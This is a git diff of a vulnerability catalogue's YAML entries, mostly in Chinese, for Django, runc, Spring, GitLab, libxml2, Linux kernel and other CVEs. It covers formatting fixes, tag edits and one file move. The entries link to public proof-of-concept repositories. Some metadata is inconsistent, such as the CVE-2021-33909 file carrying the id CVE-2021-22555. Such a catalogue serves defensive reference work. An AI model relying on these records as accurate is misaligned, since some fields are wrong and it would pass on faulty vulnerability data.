它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: high diff --git a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml index 739255fff6f5b8d6e75670786a6c6b899fed0afa..4a569da521b44bddf4cc543ff6e318bec4ea1736 100644 --- a/cve/django/2022/yaml/CVE-2022-28346.yaml +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml 
@@ -1,6 +1,5 @@ id: CVE-2022-28346 -source: - https://github.com/DeEpinGh0st/CVE-2022-28346 +source: https://github.com/DeEpinGh0st/CVE-2022-28346 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/django/2022/yaml/CVE-2022-34265.yaml b/cve/django/2022/yaml/CVE-2022-34265.yaml index ff899811dc3fbd6d847f68c27ebc5f0c2cdbaf87..48efa4d16b64cf812e7e9ab04fc13a73216fc45d 100644 --- a/cve/django/2022/yaml/CVE-2022-34265.yaml +++ b/cve/django/2022/yaml/CVE-2022-34265.yaml @@ -1,6 +1,5 @@ id: CVE-2022-34265 -source: - https://github.com/aeyesec/CVE-2022-34265 +source: https://github.com/aeyesec/CVE-2022-34265 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/docker/2019/CVE-2019-16884/ReadMe.md similarity index 100% rename from cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md rename to cve/docker/2019/CVE-2019-16884/ReadMe.md diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/docker/2019/yaml/CVE-2019-16884.yaml similarity index 70% rename from cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml rename to cve/docker/2019/yaml/CVE-2019-16884.yaml index 0f38b7149b264c59bb0cdb25337e642a9d9b21a9..5cd9d93fb706c132110ce9194ae733bff8aed61f 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/docker/2019/yaml/CVE-2019-16884.yaml 
@@ -1,7 +1,7 @@ id: CVE-2019-16884 source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: high description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory @@ -12,11 +12,11 @@ info: Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - - https://usn.ubuntu.com/usn/usn-4297-1 - - https://security.netapp.com/advisory/ntap-20220221-0004/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2019-16884 cwe-id: CWE-863 diff --git a/cve/docker/2019/yaml/CVE-2019-5736.yaml b/cve/docker/2019/yaml/CVE-2019-5736.yaml index fefd75ac700c9b8b9191aa595c22d18c9bcaf529..ac62cd4cff045327666e79725e20433d816e7704 100644 --- a/cve/docker/2019/yaml/CVE-2019-5736.yaml +++ b/cve/docker/2019/yaml/CVE-2019-5736.yaml @@ -10,7 +10,7 @@ info: RunC version <=1.0-rc6 reference: - https://www.4hou.com/vulnerable/16361.html - - https://github.com/Frichetten/CVE-2019-5736-PoC\ + - https://github.com/Frichetten/CVE-2019-5736-PoC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 8.6 
@@ -18,4 +18,4 @@ info: cwe-id: CWE-78 cnvd-id: None kve-id: None - tags: cve2019,docker.runc \ No newline at end of file + tags: cve2019, docker.runc \ No newline at end of file diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 98f30f02ba92e521ad0838c5cfcfde8a71db96b7..6774e5011a3502b0c25e2f675f2dfdcb86b55435 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,7 +19,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml index e3d36c9d323bde72ea06faa144e69dcb2830f5e0..3ef4584fa603deb73db37fac63f43b4152a559c7 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-94 cnvd-id: None kve-id: None - tags: RCE,cve2021,gitlab \ No newline at end of file + tags: RCE, cve2021, gitlab \ No newline at end of file diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml index 37a69cb5a0ff4a231a62e1afda510e65544366b1..1ba01452468f53613e49c7a42e3a294e1bdc1ef6 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml @@ -14,7 +14,7 @@ info: - https://www.tenable.com/plugins/nessus/152483 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 
diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml index 7d7575e2c31bb5d68106ca8acc26709ec971e314..3baa322fe6110a77878aa2ce3b9585fd4974250a 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file + tags: UseOfHardCodedPassword, cve2022, gitlab \ No newline at end of file diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml index 430b5e70481660950ae56c2511757b75d304fbc9..ba1e0879b9b49da6b14ec945b64599b92c5d4cec 100644 --- a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml +++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -1,6 +1,5 @@ id: CVE-2022-22978 -source: - https://github.com/DeEpinGh0st/CVE-2022-22978 +source: https://github.com/DeEpinGh0st/CVE-2022-22978 info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。 severity: critical @@ -13,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22978 cwe-id: CWE-863, CWE-285 diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index c6b5f60832ff2b547f187747a4c930ad1f429c6e..6cc798ff65a29d031b386cd4f502542c49d65475 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -1,6 +1,5 @@ id: CVE-2017-8046 -source: - https://github.com/m3ssap0/spring-break_cve-2017-8046 +source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high 
@@ -12,7 +11,7 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8046 cwe-id: CWE-20 diff --git a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml index ef202c2e1a046395a4f9c6ea7e1d3b8fc85325b5..0838f5044a5d04239efc1575e8c87bfaee095c91 100644 --- a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml +++ b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml @@ -1,6 +1,5 @@ id: CVE-2020-5398 -source: - https://github.com/motikan2010/CVE-2020-5398 +source: https://github.com/motikan2010/CVE-2020-5398 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -14,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-5398 - https://pivotal.io/security/cve-2020-5398 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2020-5398 cwe-id: CWE-494, CWE-79 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2d42eaa6e71f2eb46046c8a05838806e7..251d88ac2b7625aaf4954c65563d8113faab58d3 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 + scope-of-influence: + Spring Cloud Function<3.1.7 reference: - https://github.com/dinosn/CVE-2022-22963 - https://avd.aliyun.com/search?q=CVE-2022-22963 
diff --git a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml index e237d738a619f3cd6422b9d4cec55f4810f7b69d..c7aca8ce6c32ebb03a76c8988673e2cd470ec950 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。 - scope-of-influence: Spring Framework <5.2.20 and JDK >=9 + scope-of-influence: + Spring Framework <5.2.20 and JDK >=9 reference: - https://help.aliyun.com/noticelist/articleid/1061022382.html - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement diff --git a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml index d6ed1a5ee9ec25bd07c4f3d5373a415dd4799f21..2cf4e7e31e8fbf31c773ac03daa0f094037c8090 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml @@ -4,7 +4,8 @@ info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。 severity: critical description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。 - scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 + scope-of-influence: + 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-31692 - https://github.com/ARPSyndicate/cvemon 
diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 40166d53c33fda981f00d1bf7dbe83950f4061d0..a8b610b78abb795cd733a4414586c438438a39f4 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -1,6 +1,5 @@ id: CVE-2023-23752 -source: - https://github.com/Jenderal92/Joomla-CVE-2023-23752 +source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium @@ -17,5 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 非法访问 \ No newline at end of file + tags: 非法访问 \ No newline at end of file diff --git a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml index edf411d2d3608c1001d7fcb2a0ff8ddd8a9d350c..53eb74568e842724f7d0d500f29585e921357533 100644 --- a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml +++ b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2020,缓冲区错误 \ No newline at end of file + tags: cve2020, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml index d215f84e69159e87e6c5840c7f06d3b0b7a5e2e9..82c243eb72ca1198038c2bb0dad104d4c8833294 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3517 classification: @@ -16,4 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: cve2021,缓冲区错误 \ No newline at end of file + tags: cve2021, 缓冲区错误 \ No newline at end of file 
diff --git a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml index 54dd1885d72c56a1c7bd738e0e46846ff5252e98..33a05a166f1203940aa7978b3bfad2e3ec979f80 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3518 classification: diff --git a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml index f2db176b18b5241719597e164e7240a1b18cfa03..9302a38011a49ba7af16a17af1349d37dce29685 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3537 classification: diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml index 2442cf53bf25b63bd754c9e28f7caa1c270bf1d0..f22083e2ea6224032ab5d7c473e0fec92562c602 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml 
@@ -1,18 +1,18 @@ id: CVE-2011-4916 source: https://www.openwall.com/lists/oss-security/2011/11/05/3 info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4916 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml index 255ddd173e3737598d270fdce0240ab6d91aafd4..d4817b0509bbfeda12f621b29e969d124beba662 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml 
@@ -1,18 +1,18 @@ id: CVE-2011-4917 source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: - name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 - severity: medium - description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2011-4917 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4917 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index 797969a37fd3df1241ab80e7bf7fc240775840ba..40cfccc89e6ade1d0e32289f61e33ff49f164dfa 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -37,6 +37,7 @@ info: - https://usn.ubuntu.com/4117-1/ - https://usn.ubuntu.com/4118-1/ - https://www.debian.org/security/2019/dsa-4484 + classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2019-13272 diff --git a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml index 6a480aa959a818de90dca7390072ff81bd2f9063..c8a242be574c869f1ca7e456ef56b0224ef5bc24 100644 
--- a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml +++ b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml @@ -2,7 +2,7 @@ id: CVE-2020-12351 source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. scope-of-influence: diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml index 2be396cf3001c161023ec2893cc8c0d3c31161a9..803cefb38b3f3dd526ab741bdadfd5ef0de6c408 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml @@ -6,15 +6,17 @@ info: description: | Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。 scope-of-influence: - v2.6.19-rc1~v5.12-rc7 + v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555 - https://nvd.nist.gov/vuln/detail/CVE-2021-22555 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-787 - tags: cve2021,权限提升,容器逃逸 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升, 容器逃逸 \ No newline at end of file 
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml index e4014448e7c2c47c71e795b30d93aa8094d506d6..3355d61cf93a19a4986c3da8479bd78babb04801 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-26708 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.0 cve-id: CVE-2021-26708 cwe-id: CWE-667 + cnvd-id: None + kve-id: None tags: 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml index 4c330eb45bb0a98216eaf52585f12ced64c67df2..1047549c32368b04c47ff2e6a8f411baf9b2733b 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml @@ -11,7 +11,7 @@ info: - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-29155 cwe-id: CWE-125 diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml index bdb280f20a259f99796df27d00e93fcf71fb04d5..e4d4734ca6afd99f0b8865a36c85d9028ca8cdc0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml 
@@ -5,11 +5,9 @@ info: severity: medium description: | 在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。 - scope-of-influence: Red Hat Enterprise Linux 8 - Linux kernel before 5.12.13 - + Linux kernel < 5.12.13 reference: - https://access.redhat.com/security/cve/CVE-2021-33624 - https://ubuntu.com/security/CVE-2021-33624 @@ -17,7 +15,6 @@ info: - https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html - https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db - http://www.openwall.com/lists/oss-security/2021/06/21/1 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.7 @@ -25,5 +22,4 @@ info: cwe-id: CWE-203 cnvd-id: None kve-id: None - tags: 内存泄露, 侧信道攻击 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml index f58af1c4db5e265d3058d3b7f310f08aa7b638bf..efe2294b4af99e6883e6f548e4a81509be0fe826 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml @@ -15,4 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-120 - tags: cve2021,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml index ade74c393fc1cc591e6941b4aa727e4697294643..82972aa003838e195fbabfc63659abb9b39093ab 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml 
